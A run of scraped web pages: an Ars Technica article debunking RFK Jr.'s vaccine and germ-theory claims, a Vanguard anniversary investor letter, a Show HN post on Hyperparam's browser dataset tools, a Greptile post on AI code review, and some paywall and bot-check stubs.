, protects against rotaviruses, which cause deadly diarrheal disease in young children and killed an
estimated 500,000 people worldwide each year
before vaccines were available. RotaTeq has been proven safe and effective and is credited with
saving tens of thousands of lives
around the world each year.
Kennedy and Offit spent about an hour talking, mostly about thimerosal, an ethylmercury-containing preservative that was once used in childhood vaccines but was mostly abandoned by 2001 as a precautionary measure. RotaTeq doesn't and never did contain thimerosal—because it's a live, attenuated viral vaccine, it doesn't contain any preservatives. But Kennedy has frequently used thimerosal as a vaccine bogeyman over the years, claiming it causes harms (
there is no evidence for this
).
After their conversation, Kennedy published a story in Rolling Stone and Salon.com titled "
Deadly Immunity
," which erroneously argued that thimerosal-containing vaccines cause autism. The article was riddled with falsehoods and misleading statements. It described Offit as "
in the pocket
" of the pharmaceutical industry and claimed RotaTeq was "laced" with thimerosal. Rolling Stone and Salon amended some of the article's problems, but eventually Salon retracted it and Rolling Stone deleted it.
Looking back, Offit said he was
sandbagged
. "He's a liar. He lied about who he was; he lied about what he was doing. He was just wanting to set me up," Offit said.
Although that was the only time they had ever spoken, Kennedy has continued to disparage and malign Offit over the years. In his book dedicated to denigrating Fauci, Kennedy spends plenty of time spitting insults at Offit, calling him a "font of wild industry ballyhoo, prevarication, and outright fraud." He also makes the wildly false claim that RotaTeq "almost certainly kills and injures more children in the United States than the rotavirus disease."
Inconvincible
Understanding that Kennedy is a germ theory denialist and terrain theory embracer makes these attacks easier to understand—though no less abhorrent or dangerous.
"He holds these beliefs like a religious conviction," Offit said. "There is no shaking him from that," regardless of how much evidence there is to prove him wrong. "If you're trying to talk him out of something that he holds with a religious conviction—that's never going to happen. And so any time anybody disagrees with him, he goes, 'Well, of course, they're just in the pocket of industry; that's why they say that.'"
There are some aspects of terrain theory that do have a basis in reality. Certainly, underlying medical conditions—which could be considered a disturbed bodily "terrain"—can make people more vulnerable to disease. And, with recent advances in understanding the microbiome, it has become clear that imbalances in the microbial communities in our gastrointestinal tracts can also predispose people to infections.
But, on the whole, the evidence against terrain theory is obvious and all around us. Terrain theorists consider disease a symptom of an unhealthy internal state, suggesting that anyone who gets sick is unhealthy and that all disease-causing germs are purely opportunistic. This is nonsense: Plenty of people fall ill while being otherwise healthy. And many germs are dedicated pathogens, with evolved, specialized virulence strategies such as toxins, and advanced defense mechanisms such as antibacterial resistance. They are not opportunists.
Terrain theory's clash with reality has become painfully apparent amid Kennedy's handling—or more accurately, mishandling—of the current measles situation in the US.
Most health experts would consider the current measles situation in the US akin to a five-alarm fire. An outbreak that began at the end of January in West Texas is now the largest and deadliest the country has seen in a quarter-century. Three people have died, including two unvaccinated young children who were otherwise healthy. The outbreak has spread to at least three other states, which also have undervaccinated communities where the virus can thrive. There's no sign of the outbreak slowing, and the nation's overall case count is on track to be the highest since the mid-1990s, before measles was declared eliminated in 2000. Modeling indicates the country will lose its elimination status and that measles will once again become endemic in the US.
Given the situation, one might expect a vigorous federal response—one dominated by strong and clear promotion of the highly effective, safe measles vaccine. But of course, that's not the case.
"When those first two little girls died of measles in West Texas, he said immediately—RFK Jr.—that they were malnourished. It was the doctors that stood up and said 'No, they had no risk factors. They were perfectly well-nourished,'" Offit points out.
Kennedy has also heavily pushed the use of vitamin A, a fat-soluble vitamin that accumulates in the body and can become toxic with large or prolonged doses. It does not prevent measles and is mainly used as supportive care for measles in low-income countries where vitamin A deficiency is common. Nevertheless, vaccine-hesitant communities in Texas have embraced it, leading to reports from doctors that they have had to
treat children for vitamin A toxicity
.
Poisons
Despite the raging outbreak, Kennedy spent part of last week drumming up fanfare for a rickety plan to rid American foods of artificial food dyes, which are accused of making sugary processed foods more appealing to kids, in addition to posing their own health risks. It's part of his larger effort to improve Americans' nutrition, a tenet of terrain theory. Though Kennedy has organized zero news briefings on the measles outbreak, he appeared at a jubilant press conference on removing the dyes.
The conference was complete with remarks from people who seem to share similar beliefs as Kennedy, including famed pseudoscience-peddler Vani Hari, aka "Food Babe," and alternative-medicine guru and fad diet promoter Mark Hyman. Wellness mogul and special government employee Cally Meads also took to the podium to give a fury-filled speech in which he claimed that 90 percent of FDA's spending is because we are "poisoning our children," echoing
a claim Kennedy has also made
.
Kennedy, for his part, declared that "sugar is poison," though he acknowledged that the FDA can't ban it. While the conference was intended to celebrate the removal of artificial food dyes, he also acknowledged that there is no ban, nor forthcoming regulations, or even an agreement with food companies to remove the dyes. Kennedy instead said he simply had "an understanding" with food companies. FDA Commissioner Marty Makary explained the plan by saying: "I believe in love, and let’s start in a friendly way and see if we can do this without any statutory or regulatory changes." Bloomberg reported the next day that food industry lobbyists said
there is no agreement to remove the dyes
.
However feeble the move, a focus on banning colorful cereal during a grave infectious disease outbreak makes a lot of sense if you know that Kennedy is a germ theory denialist.
But then again, there's also the brain worm.
Beth is Ars Technica’s Senior Health Reporter. Beth has a Ph.D. in microbiology from the University of North Carolina at Chapel Hill and attended the Science Communication program at the University of California, Santa Cruz. She specializes in covering infectious diseases, public health, and microbes.
Fifty years ago today, Jack Bogle started a different kind of investment firm—one owned by its investors, ensuring a focus on making money for them, not from them.
1
Hear from our founder what makes Vanguard different
Read the transcript
John C. Bogle:
What made Vanguard different from everybody else in this industry was the structure that I picked in the first place, way back in 1974. We are owned by the shareholders. Our mission is to serve them and not some outside management company owner.
And I don't think it's self-serving to say that we are a company that is of the shareholder, by the shareholder, and for the shareholder, with a crew that understands that and implements it really quite beautifully.
People are the key to everything we do and everything we ever have done. I've often talked about human beings being the hallmark of this operation—people that care about our values, people that care about our integrity, each with their own hopes and fears and financial goals.
Read more
Vanguard was founded on the ideal that all investors deserve a fair shake—that investing ought to be lower-cost and more accessible. Bogle’s idealism was audacious at the time. In 1975, investing was reserved for the very wealthy and was stubbornly expensive, and the U.S. stock market was down by half over the prior couple years.
The "Vanguard experiment" did not take off right away, but as generations of crew persistently took action to bring us closer to our founding ideals, more people were attracted to what we had to offer. Today, more than 50 million investors have entrusted Vanguard with their financial hopes—a responsibility we embrace with great care.
I am writing first to thank you for your trust in Vanguard. It is a trust that demands our constant effort, especially given the market fluctuations this year. So, I also want to highlight actions we are taking to serve your needs today and for the long term. Finally, I offer our unwavering commitment that Vanguard will always be your firm, one that takes a stand for your needs and where our focus is on your long-term investment success.
Lowering cost matters to performance – in index and active portfolios
One of Bogle’s contrarian insights was that in investing, you get what you
don’t
pay for. The less you pay for your funds, the more you keep. A benefit of being a Vanguard investor-owner is that as we realize greater economies of scale, we pass those savings on to you through lower fees.
It is why
Vanguard has reduced expense ratios more than two thousand times.
Our relentless focus on fees is also why this February we announced the largest expense ratio cuts in our history—we expect our U.S. investors to save more than $350 million this year alone.
2
The Vanguard Effect has also spurred price competition across the industry, as our low-cost offerings draw attention to the importance of fees to long-term results.
Helping investors keep more of their returns
Annual cost of hypothetical $10,000 investments
3
Sources:
Vanguard and Morningstar, Inc. as of December 31, 2024.
Bogle’s insight was contrarian because lower cost portfolios tend to outperform higher cost ones—in index and active.
4
Skilled, low-fee active managers can be more prudent and disciplined than higher-fee managers who can feel compelled to take on greater risk to offset their higher fees. This is the main reason why Vanguard’s index and active funds have outperformed over the past decade.
Percentage of Vanguard funds that have outperformed the competition
5
Ten years ended December 31, 2024
Sources:
Vanguard, based on data from LSEG Lipper.
Extending The Vanguard Effect to fixed income and cash savings
If the market turmoil of the past few months has highlighted one thing, it is the importance of diversification—especially between stocks and bonds. Bonds can be sound diversifiers and, as
Vanguard’s long-term outlook
indicates, they can be good sources of return and income—which is especially important if you are retired.
The bond market is significantly larger than the stock market and much more complex and inefficient, providing greater opportunities for active management to outperform. But competitors’ fees for active fixed income have remained persistently high. You deserve a better deal.
6
At Vanguard we have been managing fixed income portfolios for forty years. Our combination of high skill and low fees (a quarter of the industry average) has resulted in
92% of our active fixed income funds outperforming
their peer group averages over the last 10 years.
7
You also deserve a better deal on cash savings. Vanguard’s money market funds already provide strong performance at low fees but, you probably also hold traditional savings accounts—whether for the convenience of paying bills or FDIC insurance. But the typical savings account yields less than half a percent.
Knowing we could do far better than that, we launched our Cash Plus offer. At present, it pays 3.65%, nearly 9x what you could earn with the average savings account, and it includes features like the ability to pay bills and FDIC insurance.
8
In two years, a Cash Plus account with a $10,000 balance could have earned nearly $1,000 more with our bank sweep program than with a traditional bank savings account.
9
Beyond extending The Vanguard Effect to fixed income and cash, we are expanding our long-standing alliances with third-party managers to provide better access to institutional-quality private assets and guaranteed income solutions — as we believe they can play a role in certain long-term portfolios. We are at work developing solutions for your needs and will have more to announce on that front later this year.
Investing to lead in client experience
Spending time with clients and crew since I joined Vanguard last year, I’ve heard firsthand your frustration when our service hasn’t met your expectations.
It’s something we have been focused on improving and our efforts are beginning to shine through.
Our client satisfaction ranks number one according to the JD Power 2025 U.S. Do-it-Yourself Investor Satisfaction Study released last month.
10
We have nearly completed modernizing our personal investor technology, moving off legacy mainframe systems to cloud computing, and we expect to be in a similar position with workplace retirement in about a year. This means you can count on our technology to be much more responsive and resilient, and for your digital experience to be improving at a much swifter pace.
To meet and stay ahead of your needs—
we’ve more than doubled our technology investments over the past five years.
In 2025, we will invest $3 billion in our platforms and capabilities, including artificial intelligence, digital channels, and phone and chat services, to ensure we serve you well.
Democratizing advice and investor choice
We recently stood up a new Advice & Wealth Management group. We have been offering advice for over a decade and see it as central to helping investors reach their goals. Our new group is a response to more investors wanting us to scale our offering and expand in specialized areas like tax and estate planning.
Last fall,
we lowered the investment minimum to $100 for our award-winning U.S. Digital Advisor service.
11
We are also bringing our tradition of low fees to advice, offering high quality, full-service advisors for an annual fee of 0.3%—roughly a quarter of the industry average.
12
We seek to democratize more than advice—including how you vote the shares of the companies you own through Vanguard funds. For the 2025 proxy voting season, our pioneering Vanguard
Investor Choice
program will apply to $250 billion in assets, nearly double our 2024 program pilot.
Thank you for your trust
Jack Bogle founded Vanguard because he believed it was possible for people to invest for the long term, with simplicity and integrity, and at low cost. Fifty years later, all of us crew members at Vanguard see ourselves as stewards of this mission.
Even as the current economic outlook and markets are in a state of flux, I want to reassure you that our mission—to give
you
the best chance for investment success—is steadfast. We are also evolving, taking action to ensure we remain zealous in the pursuit of your success.
Thank you for entrusting Vanguard with your hard-earned savings. I look forward to reporting back to you next year on our progress.
Related content
1 Vanguard is owned by its funds, which are owned by Vanguard’s fund shareholder clients.
2 Comparison uses AUM as of 11/2024. There is no guarantee that any individual investor will save money due to the reductions in expense ratios. Figures are estimates and should not be relied on. For illustrative purposes only. See
corporate.vanguard.com/feecuts
for details.
3 Data assume that a pair of constant $10,000 portfolios are invested in Vanguard funds and non-Vanguard funds and divided to reflect the relative market share of each fund, based on its actual assets under management over time. Data reflect actual fund expense ratios of all U.S.-domiciled mutual funds and exchange-traded funds, as of December 31, 2024.
5 For the ten-year period ended December 31, 2024, 6 of 6 Vanguard money market funds, 70 of 97 bond funds, 21 of 23 balanced funds, and 168 of 191 stock funds, or 265 of 317 Vanguard funds overall, outperformed their peer group averages. Results will vary for other time periods. Only U.S.-domiciled funds with a minimum ten-year history were included in the comparison. The competitive performance data shown represent past performance, which is not a guarantee of future results. All investments are subject to risks. For the most recent performance, visit
vanguard.com/performance
.
6 The dollar-weighted average expense ratio for actively managed, non-Vanguard fixed income mutual funds and ETFs is 0.53%, more than five times the equivalent Vanguard expense ratio of 0.10%. Source: Vanguard calculations using Morningstar data. Expense ratios weighted by assets as of November 30, 2024.
7 For the ten-year period ended December 31, 2024, 6 of 6 Vanguard money market funds and 40 of 44 actively managed bond funds, or 46 of 50 Vanguard active fixed income funds overall, outperformed their peer group averages. Results will vary for other time periods. Only funds with a minimum ten-year history were included in the comparison. The competitive performance data shown represent past performance, which is not a guarantee of future results. All investments are subject to risks. For the most recent performance,
visit vanguard.com/performance
.
8 The Vanguard Cash Plus Account program APY (annual percentage yield) is 3.65% as of April 30, 2025. The APY will vary and may change at any time. Source for average bank savings yield of 0.41%: FDIC National Rates and Rate Caps as of February 18, 2025. Cash Plus bank sweep program APY is current as of date of publication. Current APY is available at vanguard.com. The Vanguard Cash Plus Account is a brokerage account offered by Vanguard Brokerage Services, a division of Vanguard Marketing Corporation, member FINRA. Some third-party institutions may not accept the Cash Plus Account routing number for transactions. If you have any issues using the routing number on a third-party website, contact the provider. There may be other material differences between these products that must be considered prior to investing.
Bank Sweep program balances are held at one or more Program Banks, earn a variable rate of interest, and are not securities covered by SIPC. They are not cash balances held by Vanguard Brokerage Services, a division of Vanguard Marketing Corporation (VMC); VMC is not a bank. Balances are eligible for FDIC insurance subject to applicable limits. See the list of
participating Program Banks
.
9 Source: Vanguard and FDIC National Rates and Rate Caps. This example is for illustrative purposes only and does not represent the return on any particular investment. It assumes a $10,000 investment, no additional transactions are made and factors in compounding. It is based on an estimate of total interest earned during the period May 24, 2022, through December 30, 2024, using the Vanguard Cash Plus bank sweep program’s actual daily APY (annual percentage yield will vary and may change at any time). For savings accounts, the applicable monthly APY according to FDIC National Rates and Rate caps was used as the daily APY for each month presented (During this time the average APY rate for Savings was 0.46%, and the Cash Plus Account was 4.15%.) There may be other material differences between these products that must be considered prior to investing, including the level of risk associated with each product type.
Past performance is no guarantee of future results.
10 The
J.D. Power 2025 U.S. Investor Satisfaction Study
surveyed approximately 4,000 self-directed investors. Vanguard previously secured the number 1 ranking in 2021, 2022, and 2023, and the number 2 ranking in 2024. The survey was fielded between January and December 2024 and measured satisfaction in seven key dimensions on a 1,000-point scale: product and service offerings meet investors’ needs; ease in doing business with the firm; digital channels; people; value for fees paid; and level of trust with the firm.
For J.D. Power 2025 award information, visit
jdpower.com/awards
. Use of study results in promotional materials is subject to a license fee; no compensation was provided for award consideration.
12 According to Cerulli research, the industry average asset-based advisory fee ranges from 1.25% for a client with $100,000 in investable assets to 0.67% for a client with $10 million. Advisory fees exclude products’ embedded management fees and are self-reported by advisors. Source: Cerulli Associates. The Cerulli Edge: The Americas Asset and Wealth Management Edition: The Fees Issue, March 2025.
Vanguard Personal Advisor Select and Vanguard Personal Advisor Wealth Management charge fees based on a tiered fee schedule (maximum 0.30%) calculated as an average advisory fee on all advised assets. Vanguard Digital Advisor charges Vanguard Brokerage Accounts an annual gross advisory fee of 0.20% for its all-index investment options and 0.25% for an active/index mix. Vanguard Personal Advisor charges Vanguard Brokerage Accounts an annual gross advisory fee of 0.35% for its all-index investment options and 0.40% for an active/index mix. Vanguard Digital Advisor and Vanguard Personal Advisor reduce those fees by the amount of revenue that Vanguard (or a Vanguard affiliate) retains from your portfolio in order to calculate your net advisory fee. Note that this fee doesn't include investment expense ratios charged by a fund, such as fees paid to the funds' third-party managers which are not credited. While we generally recommend using low-cost Vanguard funds to build your portfolio, actively managed funds will have higher expense ratios than index funds. Please review each service's advisory brochure for more fee information. You should consult your plan fee disclosure notice for the applicable annual gross advisory fees that apply to your 401(k) account.
IMPORTANT INFORMATION:
For more information about Vanguard funds, visit vanguard.com to obtain a prospectus or, if available, a summary prospectus. Investment objectives, risks, charges, expenses, and other important information are contained in the prospectus; read and consider it carefully before investing.
All investing is subject to risk, including possible loss of principal. Diversification does not ensure a profit or protect against a loss. Past performance is not a guarantee of future results.
Bond funds are subject to the risk that an issuer will fail to make payments on time, and that bond prices will decline because of rising interest rates or negative perceptions of an issuer's ability to make payments.
Vanguard is reducing expense ratios for certain share classes of some funds. There is no guarantee that any individual investor will save money due to the reductions in fund expense ratios. Not all fund share classes will have a reduced expense ratio and therefore not all investors will experience the estimated savings. Investors that purchase the relevant funds after the expense ratios have been reduced will not experience savings. Savings means future money not spent on expense ratios and does not entail a rebate or deposit of any sort. Savings figures are estimates and should not be relied upon. Savings is based on data as of November 30, 2024; if other data is used, savings may differ. Estimated savings accrue to existing investors holding relevant share classes for 2024 and 2025. For illustrative purposes only. Past performance is not indicative of future results.
The Vanguard Cash Plus Account is a brokerage account offered by Vanguard Brokerage Services, a division of Vanguard Marketing Corporation, member FINRA and SIPC. Under the Sweep Program, Eligible Balances swept to Program Banks are not securities: they are not covered by SIPC, but are eligible for FDIC insurance, subject to applicable limits. Money market funds held in the account are not guaranteed or insured by the FDIC, but are securities eligible for SIPC coverage. See the
Vanguard Bank Sweep Products Terms of Use
and
Program Bank list
for more information.
Savings accounts may have characteristics that differentiate them from bank sweep programs offered by Vanguard Cash Plus. For example, they may offer overdraft protection, ATM access (immediate access to your money), and other convenience features. Each company's products differ, so it's important to ask questions to understand account features.
Vanguard advice services are provided by Vanguard Advisers, Inc. ("VAI"), a registered investment advisor, or by Vanguard National Trust Company ("VNTC"), a federally chartered, limited-purpose trust company. VAI and VNTC are subsidiaries of The Vanguard Group, Inc., and affiliates of Vanguard Marketing Corporation ("VMC"). Neither VAI, VNTC, nor its affiliates guarantee profits or protection from losses.
Show HN: Hyperparam: OSS Tools for Exploring Datasets Locally in the Browser
Hyperparam was founded to address a critical gap in the machine learning ecosystem: the lack of a user-friendly, scalable UI for exploring and curating massive datasets.
Our mission is grounded in the belief that data quality is the most important factor in ML success, and that better tools are needed to build better training sets. In practice, this means enabling data scientists and engineers to
“look at your data”
– even terabyte-scale text corpora – interactively and entirely in-browser without heavy infrastructure. By combining efficient data formats, high-performance JavaScript libraries, and emerging AI assistance, Hyperparam's vision is to put data quality front and center in model development. Our motto
“the missing UI for AI data”
reflects its goal to make massive data exploration, labeling, and quality management as intuitive as modern web apps, all while respecting privacy and compliance through a local-first design.
Mission and Vision: Data-Centric AI in the Browser
Our mission is to empower ML practitioners to create the best training datasets for the best models. This stems from an industry-wide realization that
model performance is ultimately bounded by data quality
, not just model architecture or hyperparameters. Hyperparam envisions a new workflow where:
Interactive Data Exploration at Scale:
Users can freely explore huge datasets (millions or billions of records) with fast, free-form interactions to uncover insights. Unlike traditional Python notebooks that struggle with large data (often requiring downsampling or clunky pagination), Hyperparam leverages browser technology for a smooth UI.
AI-Assisted Curation:
Hyperparam integrates ML models to help label, filter, and transform data at a scale that would be impractical to review manually. By combining a highly interactive UI with model assistance, we make it possible for the user to use data to express exactly what they want from the model.
Local-First and Private:
Hyperparam runs entirely client-side, with no server dependency. This design not only simplifies setup (no complex pipeline or cloud needed) but also addresses enterprise compliance and security concerns, since sensitive data need not leave the user's machine. Fully browser-contained tools can bypass major adoption hurdles.
Experts across data engineering and MLOps widely agree on the need for better data exploration and labeling tools to tackle today's bottlenecks. We believe that the way to do that is to make data-centric AI workflows that are faster, easier to deploy, and more scalable – enabling users to iteratively improve data quality, which in turn yields better models.
The Hyperparam OSS Universe
Hyperparam delivers on our vision through a suite of open-source tools that tackle different aspects of data curation. These tools are built in TypeScript/JavaScript for seamless browser and Node.js usage.
We care about performance, minimal dependencies, and standards compliance.
Hyparquet: In-Browser Parquet Data Access
Hyparquet
is a lightweight, pure-JS library for reading
Apache Parquet
files directly in the browser. Parquet is a popular columnar format for large datasets, and Hyparquet enables web applications to tap into that efficiency without any server.
Hyparquet allows data scientists to open large dataset files instantly in a browser UI for examination, without needing Python scripts, servers, or cloud databases. It's useful for quick dataset validation (e.g. checking a sample of a new data for quality issues) and for powering web-based data analysis tools. Because it's pure JS, developers can integrate Hyparquet into any web app or Electron application that needs to read Parquet. It is the core engine behind Hyperparam's own dataset viewer, enabling what was previously thought impossible:
client-side
big data exploration.
Browser-Native & Dependency-Free:
Hyparquet has
zero external dependencies
and is designed to run in both modern browsers and Node.js. At ~9.7 KB gzipped, it's extremely lightweight. It implements the full Parquet specification, aiming to be the “world's most compliant Parquet parser” that can open more files (all encodings and types) than other libraries.
Efficient Streaming of Massive Data:
Built with performance in mind, Hyparquet only loads the portions of data needed for a given query or view. It leverages Parquet's built-in indexing to fetch just the required rows or columns on the fly. This “load just in time” approach makes it feasible to interactively explore multi-gigabyte or even billion-row datasets in a web app.
Complete Compression Support:
Parquet files often use compression (Snappy, Gzip, ZSTD, etc.). Hyparquet by default handles common cases (uncompressed, Snappy), and with a companion library Hyparquet-Compressors, it supports
all
Parquet compression codecs. This is achieved with WebAssembly-optimized decompressors – notably HySnappy, a WASM Snappy decoder that accelerates parsing with minimal footprint.
Hyparquet-Writer: Export Parquet Files from JavaScript
To complement Hyparquet's reading capabilities,
Hyparquet-Writer
provides a way to write or export data to Parquet format in JavaScript. It is designed to be as lightweight and efficient as its reading counterpart.
After exploring or filtering a dataset with Hyperparam's tools, a user might want to save a subset or annotations. Hyparquet-Writer makes it possible to export those results
in-browser
as a Parquet file (or in Node.js without needing Python/Java libraries). This is valuable for creating shareable
“refined datasets”
or for moving data between systems while staying in Parquet (avoiding expensive CSV conversions).
Fast Parquet Writing in JS:
Hyparquet-Writer can take in JavaScript data (arrays of values per column) and output a binary Parquet file. It provides high efficiency and compact storage, so that even in-browser data manipulation results can be saved in a columnar format. It is especially efficient at representing sparse annotation data.
Extreme Data Compression:
Parquet can represent large datasets very efficiently. It is especially efficient at representing sparse annotation data, exactly what we need for annotating and curating datasets.
Tiny and easy to deploy:
Before Hyparquet-Writer the only way to write parquet files from the browser was huge wasm bundles (duckdb, datafusion). Hyparquet-Writer is less than 100kb of pure JavaScript, so it’s trivial to include with modern frontend applications.
HighTable: Scalable React Data Table Component
HighTable
is a React-based virtualized table component for viewing extremely large tables in the browser. It is the UI workhorse that displays data fetched by Hyparquet or other sources.
HighTable is crucial for visual data exploration. In Hyperparam's dataset viewer, HighTable renders the content of Parquet files, allowing you to scroll through data that far exceeds memory limitations. You can also embed HighTable in custom web apps where a large results table is needed (for example, viewing logs, telemetry, or any big tabular data) without losing interactivity. By handling only what's visible, it bridges the gap between big data backends and a smooth front-end experience.
HighTable provides:
Virtual Scrolling for Large Data:
Instead of rendering thousands or millions of rows (which would choke the browser), HighTable only renders the rows in the current viewport, dynamically loading more as you scroll. This ensures smooth performance even with datasets that have millions of entries.
Asynchronous Data Loading:
HighTable works with a flexible data model that can fetch data on-the-fly. The table requests rows for a given range (e.g., 100–200) through a provided function. This means the data could come from an in-memory array, an IndexedDB store, or a remote source via Hyparquet. HighTable is agnostic as long as it can retrieve slices. This design allows infinite scrolling through data of “any size”.
Rich Table Features:
Despite focusing on scale, HighTable offers convenient features expected in a spreadsheet-like interface: optional column sorting, adjustable column widths, and event hooks (e.g., double-click on a cell). It even displays per-cell loading placeholders to indicate when data is being fetched, maintaining a responsive feel.
Icebird: JavaScript Apache Iceberg Table Reader
Icebird
extends Hyperparam's reach into data stored in
Apache Iceberg
format. Iceberg is a popular table format for data lakes (often used on Hadoop/S3 storage) which contain Parquet files under the hood. Importantly, Iceberg allows you to efficiently evolve large datasets (add/remove rows, add columns, etc). Icebird is essentially a JavaScript Iceberg client that can read Iceberg table metadata and retrieve data files, built on top of Hyparquet.
If you are using Data Lake/Lakehouse architectures, Icebird makes it possible to inspect large Iceberg tables without a big data engine. A data engineer can point Hyperparam's viewer at an S3 path of an Iceberg table and quickly peek at a few rows or columns for validation. This is dramatically simpler than launching Spark or Trino for a small inspection task. Icebird brings our
“no backend”
philosophy to another major data format.
Iceberg Table Access:
Given a pointer to an Iceberg table (for example, a directory or catalog entry on cloud storage), Icebird can read the table's schema and metadata, then use Hyparquet to read the actual parquet file fragments that make up the table. It supports Iceberg's features like schema evolution (rename columns) and position deletes, with a roadmap to cover more features as needed.
Time Travel Queries:
Icebird allows users to retrieve data from older snapshots of the dataset (a feature of Iceberg) by specifying a metadata version to read. This is useful for auditing changes in data over time or reproducing an experiment on a previous dataset state – all from a browser environment.
Hyllama: Llama.cpp Model Metadata Parser
Hyllama
is a slightly different tool in Hyperparam's suite – it's focused on
model files rather than dataset files
. Specifically, Hyllama is a JavaScript library to parse
llama.cpp
.gguf
files (a format for LLaMA and related large language model weights) and extract their metadata.
Hyllama's primary use case is to allow users to
inspect an LLM model's content
(architecture parameters, vocab size, layer counts, etc.) and potentially even query its listed tokens or other metadata
in the browser
. For instance, you can drag-and-drop a
.gguf
model file onto a web page using Hyllama and quickly see what architecture and quantization it has, without running the model. You can use Hyllama to introspect model files easily or verify that model files match a datasets scheme expectations.
Efficient Metadata Extraction:
LLM model files in GGUF format can be tens of gigabytes, which is impractical to load entirely in memory. Hyllama is designed to
read just the metadata
(and tensor indexes) from the file
without loading full weights
, by using partial reads (e.g., reading the first few MBs that contain the header and index).
No Dependencies & Web-Friendly:
Like Hyparquet, Hyllama is dependency-free and can run in both Node and browser environments. For browser use, it suggests employing HTTP range requests to fetch just the needed bytes of a model file.
Hyperparam CLI: Local Dataset Viewer
The
Hyperparam CLI
ties everything together into a user-facing application. It is a command-line tool that, when run (
npx hyperparam
), launches a local web application for dataset viewing. Essentially, it's a one-command way to spin up the Hyperparam browser UI on your own local data.
Scalable Local Dataset Viewer:
By running the CLI, users can point it to a file, folder, or URL containing data and open an interactive browser view. For example,
npx hyperparam mydataset.parquet
will open the Hyperparam web UI and display the contents of that Parquet file in a scrollable table. If a directory is given, it provides a file browser to pick a dataset. Under the hood, the CLI uses Node.js to serve the static app and utilizes Hyparquet/Icebird libraries (via a built-in API) to fetch data from local disk or remote URLs, then displays it with HighTable in the browser.
How the Tools Work Together
Hyperparam's suite of open-source tools is the backbone of a cohesive ecosystem tailored specifically for machine learning data workflows, enabling interactive exploration and management directly in the browser. By integrating efficient in-browser data handling (Hyparquet and Icebird), scalable visualization (HighTable), intuitive data export capabilities (Hyparquet-Writer), and model metadata inspection (Hyllama), we hope to show that there is a better way to build data-centric ML tools. We are releasing this work as open source because we believe that everyone benefits from having a strong ecosystem of AI data tools.
If you find these free open source tools useful, please show it! We love GitHub Stars ⭐
Enter your email to hear about new Hyperparam tools and libraries:
Maybe Zelenskiy Should Be Writing the Art of the Deal
We've detected unusual activity from your computer network
To continue, please click the box below to let us know you're not a robot.
Why did this happen?
Please make sure your browser supports JavaScript and cookies and that you are not
blocking them from loading.
For more information you can review our
Terms of Service
and
Cookie Policy
.
Need Help?
For inquiries related to this message please
contact
our support team
and provide the reference ID below.
The out-of-memory (OOM) killer has long been a scary and controversial part
of the Linux kernel. It is summoned from some dark place when the system
as a whole (or, more recently, any given control group) is running so low
on memory that further allocations are not possible; its job is to kill off
...
Reader subscriptions are a necessary way
to fund the continued existence of LWN and the quality of its content.
If you are already an LWN.net subscriber, please log in
with the form below to read this content.
Please consider
subscribing to LWN
. An LWN
subscription provides numerous benefits, including access to restricted
content and the warm feeling of knowing that you are helping to keep LWN
alive.
(Alternatively, this item will become freely
available on May 15, 2025)
AI code review: Should the author be the reviewer?
Alternate title: I’m using AI to write code. Is it silly to use AI to review it?
I'm Daksh, a co-founder of Greptile. Our product uses AI to review pull requests to surface bugs and anti-patterns that humans might miss.
Here is an example
of what that looks like.
Recently, I was curious to see if there exists a power law in the number of PRs opened by individual Greptile users. In other words - were some users opening orders of magnitude more PRs than others? A quick SQL query later, I discovered that there is a power law to this.
I also noticed something else very interesting:
At the far left of the long list of GitHub usernames was “devin-ai-integration[bot]”.
An AI bot was writing more pull requests than any individual human. [1]
Seeing as Devin uses the same LLMs under-the-hood as Greptile, it does raise an interesting question - should the author be the reviewer?
[1] Granted that this is somewhat of a technicality. Devin’s contributions across many orgs are being counted in aggregate here. It would be more accurate to treat “Devin @ Company A” and “Devin @ Company B” as separate entries in this chart.
Most software companies wouldn’t want the PR reviewer to be the same person as the PR author. A large part of why PR reviews happen is to ensure every new piece of code is getting a
fresh
set of eyes. It seems silly to have
Claude
Sonnet generate a bunch of code, and then expect Claude Sonnet to find bugs in it.
There are a few counterpoints worth discussing:
Statelessness
If you’ve used LLM APIs, you’ll notice that they are stateless. Every inference call is a clean slate request for intelligence. As a result - asking an LLM to review its own code
is
looking at it with a fresh set of eyes.
Scaffolding
Scaffolding refers generally to the specific workflows that a tool uses to wrap the LLM call to allow it to do the task at hand. For an AI code reviewer it might be the set of steps it takes to review a diff, checking for bugs, formulating comments, and finally self-assessing comment severity, plus the context retrieval along the way to ensure it’s looking at the relevant docs files and other code files in the codebase. For Devin, it likely is just as complex and completely different. In other words, the reviewer is in fact materially different from the author. These are two distinct cars that just happen to have the same
engine
.
How different are two humans, really?
In a pre-AI world, the author and reviewer of a PR are two distinct people. However, they contain the same intelligence at their core, not unlike two AI tools. Not only do they share a functionally identical brain from a biological standpoint, they even have shared knowledge since they are both trained engineers and shared context since they are coworkers at the same company.
AI-Generated Code Needs Closer Reviewing
AI code isn’t slop, but it is a little sloppy
There is no doubt that AI has made programmers faster and more effective. That said, in my opinion, AI has
reduced
the average quality of the code that
good
engineers write. This is not strictly because the models produce worse code than good engineers. It’s because:
Prompting is an imperfect and lossy way to communicate requirements to AI
Engineers underestimate the degree to which this is true, and don’t carefully review AI-generated code to the degree to which they would review their own.
The reason for #2 isn’t complacency, one can review code at the speed at which they can think and type, but not at the speed at which an LLM can generate.When you’re typing code, you review-as-you-go, when you AI-generate the code, you don’t.
Interestingly, the inverse is true for mediocre engineers, for whom AI actually improves the quality of the code they produce. AI simply makes good and bad engineers converge on the same median as they rely on it more heavily.
Humans are bad at catching the types of bugs that AI introduces
AI-generated code generally contains more bugs. Moreover, these bugs are not the type humans would introduce. How often have you found a
Cursor
’s “Apply” function changed a line of code you didn’t expect it would change, and you didn’t notice until later? How many of those bugs were things you could see yourself introducing without AI?
Moreover, PR review is not a great way to catch bugs.
Humans just aren’t that good at detecting them,
so PR review tends to be more of a style/pattern enforcement exercise, and on occasion an architecture review.
Oddly, it turns out AI
is
actually much better than humans at finding bugs in code. During our tests, we found the newest
Anthropic
Sonnet model correctly identified 32 out of the 209 bugs in the “hard” category of our bug finding benchmark. For reference, none of the highly skilled engineers at Greptile could identify more than 5-7.
Note that 32/209 isn’t
great
either, it’s just better than the human developer.
Just In: Used Car Salesman Sincerely Feels You Need A Used Car
Disclaimer in case it wasn’t clear - we sell an AI code reviewer, so take what you will from this. This isn’t an exercise in intellectual dishonesty that exists to persuade you to buy, it’s the earnest attempt at intellectual honesty that led us to work on
AI code review
in the first place.
Security updates for Thursday
Linux Weekly News
lwn.net
